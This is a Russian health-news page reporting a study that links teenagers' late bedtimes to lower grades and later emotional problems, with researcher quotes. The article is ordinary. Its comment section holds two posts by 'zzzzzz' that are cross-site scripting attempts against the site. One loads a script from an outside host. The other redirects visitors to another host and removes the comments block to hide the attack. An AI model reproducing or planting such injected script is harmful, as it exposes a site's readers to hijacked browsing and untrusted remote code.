Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Во сколько школьник лег –...  >>  Во сколько школьник лег – такие оценки и получил!
 
Обратная связь
 

Во сколько школьник лег – такие оценки и получил!

Размер шрифта
28 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ваш ребенок поздно ложится, рано встает в школу и вроде бы все успевает? На самом деле все может быть совсем не так прекрасно – недавнее исследование показало, что подростки, которые ложатся поздно в течение учебного года, имеют худшую успеваемость и высокий риск развития эмоциональных расстройств в будущем.

Результаты недавнего исследования, опубликованного в Journal of Adolescent Health, только подтвердили гипотезу ученых о том, что начало учебного дня для тинейджеров лучше перенести на более позднее время.

«Если ребенок (а тем более – подросток) ложится спать позже 23:30, это может привести к снижению среднего балла в школьном аттестате и некоторым эмоциональным нарушениям в колледже и во взрослой жизни», – говорит ведущий автор исследования Лорен Асарнов из отделения психологии в Университете Калифорнии, Беркли.

Для исследования были собраны данные о режиме сна и количестве часов сна в сутки у 2 700 тинейджеров от 13 до 18 лет. Через 6 лет были собраны данные об их успеваемости и эмоциональном состоянии. Основной целью работы было определить, есть ли взаимосвязь между структурой сна и суточным ритмом у детей старших классов, их средним баллом в школьном аттестате и психологическими проблемами после окончания школы.

Около 23% подростков заявили, что ложатся спать в 23:15 или позже. Однако, как показало изучение жизни этих подростков в момент окончания школы и учебы в колледже, такой поздний отход ко сну приводил как к снижению среднего балла, так и к значительным эмоциональным проблемам в возрасте от 18 до 26 лет. Ученые также ссылаются на предыдущее исследование, которое показало, что подростки, которые предпочитают откладывать дела на поздний вечер и поздно ложиться спать, при утреннем тестировании показывали худшие результаты в заданиях на память и внимание.

Асарнов настойчиво рекомендует родителям помогать своим детям ложиться спать пораньше и отмечает, что режим сна у подростка достаточно легко поддается корректировке при правильном отношении и при условии приложения некоторых усилий. Однако изменение времени засыпания от позднего к более раннему может быть довольно трудным частично из-за того, что для 30-40% подростков более позднее засыпание имеет под собой биологические причины, связанные с периодом полового созревания. Помимо этого, учебные нагрузки, частое использование современных гаджетов, а также режим сна друзей оказывают непосредственное влияние на то, во сколько ребенок ложится спать.

Тимоти Монк, кандидат наук, директор исследовательских программ в Университете Питтсбурга, согласен с тем, что необходимость вставать в школу очень рано может увеличивать вероятность низкой успеваемости и некоторых психологических проблем  по причине недостатка сна. «Раннее начало школьных занятий ограничивает время учеников на сон», – заявляет он.

Правильный режим сна чрезвычайно важен, причем не только для физического здоровья, но и для хорошей успеваемости и психологического комфорта вашего ребенка. Поэтому не стоит поощрять его, если он засиживается допоздна.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выбирайте матрас правильно   Как уснуть, если мысли бегают в голове   В какой позе спать, чтобы ничего не болело?   Хотите секса? Ложитесь спать!  
15 июля 2013Сколько нужно спать, чтобы помнить все 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
30 мая 2013Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 

Слайдшоу

1
Самые неожиданные причины усталости
Почему женщины не могут выспаться?
Как избавиться от храпа мужа или своего?

Тесты

1
Возраст мозга
Хорошо ли Вы спите?
Нормальный ли у вас сон?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.